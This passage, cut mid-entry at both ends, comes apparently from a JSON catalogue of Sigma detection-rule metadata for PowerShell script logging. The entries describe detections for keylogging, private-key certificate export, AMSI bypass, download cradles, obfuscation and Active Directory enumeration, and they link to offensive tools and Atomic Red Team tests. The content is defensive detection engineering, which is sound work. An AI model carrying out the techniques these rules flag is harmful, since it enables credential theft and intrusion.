[ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", "value": "Suspicious SSL Connection" }, { "description": "Detect adversaries enumerate sensitive files", "meta": { "author": "frack113", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_sensitive_file_discovery.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1570814999370801158", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", "value": "Powershell Sensitive File Discovery" }, { "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_as_rep_roasting.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "value": "Get-ADUser Enumeration Using UserAccountControl Flags" }, { "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "posh_ps_active_directory_module_dll_import.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/ADModule", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml" ], "tags": [ "attack.reconnaissance", "attack.discovery", "attack.impact" ] }, "uuid": "9e620995-f2d8-4630-8430-4afd89f77604", "value": "Potential Active Directory Enumeration Using AD Module - PsScript" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" }, { "description": "Detects calls to \"get-process\" where the output is piped to a \"where-object\" filter to search for security solution processes.\nAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus\n", "meta": { "author": "frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-16", "falsepositive": [ "False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.", "As the \"selection_cmdlet\" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced" ], "filename": "posh_ps_get_process_security_software_discovery.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", "value": "Security Software Discovery Via Powershell Script" }, { "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", "meta": { "author": "frack113", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "posh_ps_keylogging.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" ], "tags": [ "attack.collection", "attack.t1056.001" ] }, "related": [ { "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", "value": "Powershell Keylogging" }, { "description": "Uses PowerShell to install/copy a file into a system directory such as \"System32\" or \"SysWOW64\"", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-27", "falsepositive": [ "Unknown" ], "filename": "posh_ps_copy_item_system_directory.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" ], "tags": [ "attack.credential-access", "attack.t1556.002" ] }, "related": [ { "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "value": "Powershell Install a DLL in System Directory" }, { "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", "meta": { "author": "frack113", "creation_date": "2021-12-27", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_networkcredential.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" ], "tags": [ "attack.credential-access", "attack.t1110.001" ] }, "related": [ { "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", "value": "Suspicious Connection to Remote Account" }, { "description": "Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-23", "falsepositive": [ "Legitimate certificate exports by administrators. Additional filters might be required." ], "filename": "posh_ps_export_certificate.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "value": "Certificate Exported Via PowerShell - ScriptBlock" }, { "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Legitimate usage of the cmdlet to forward emails" ], "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" }, { "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_directoryservices_accountmanagement.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ "attack.persistence", "attack.t1136.002" ] }, "related": [ { "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "value": "Manipulation of User Computer or Group Security Principals Across AD" }, { "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "posh_ps_amsi_null_bits_bypass.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa2559c8-1197-471d-9cdd-05a0273d4522", "value": "Potential AMSI Bypass Script Using NULL Bits" }, { "description": "Detects suspicious PowerShell download command", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "PowerShell scripts that download content from the Internet" ], "filename": "posh_ps_susp_download.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0", "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "value": "Suspicious PowerShell Download - Powershell Script" }, { "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-16", "falsepositive": [ "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], "filename": "posh_ps_susp_write_eventlog.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "value": "PowerShell Write-EventLog Usage" }, { "description": "Detects PowerShell scripts set ACL to of a file or a folder", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_set_acl.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222" ] }, "related": [ { "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cae80281-ef23-44c5-873b-fd48d2666f49", "value": "PowerShell Script Change Permission Via Set-Acl - PsScript" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "meta": { "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/adrecon/AzureADRecon", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/besimorhino/powercat", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://adsecurity.org/?p=2921", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/calebstewart/CVE-2021-1675", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1482", "attack.t1087", "attack.t1087.001", "attack.t1087.002", "attack.t1069.001", "attack.t1069.002", "attack.t1069", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "value": "Malicious PowerShell Commandlets - ScriptBlock" }, { "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" ], "tags": [ "attack.discovery", "attack.t1201" ] }, "related": [ { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" }, { "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", "meta": { "author": "frack113, Tim Shelton (fp AWS)", "creation_date": "2021-10-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_windowstyle.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.003" ] }, "related": [ { "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", "value": "Suspicious PowerShell WindowStyle Option" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" }, { "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", "value": "Change User Agents with WebRequest" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_zip_compress.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" }, { "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_capture_screenshots.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", "value": "Windows Screen Capture with CopyFromScreen" }, { "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-07-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_adrecon_execution.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", "value": "PowerShell ADRecon Execution" }, { "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Legitimate use of the library" ], "filename": "posh_ps_download_com_cradles.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "value": "Potential COM Objects Download Cradles Usage - PS Script" }, { "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2020-10-10", "falsepositive": [ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "filename": "posh_ps_root_certificate_installed.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 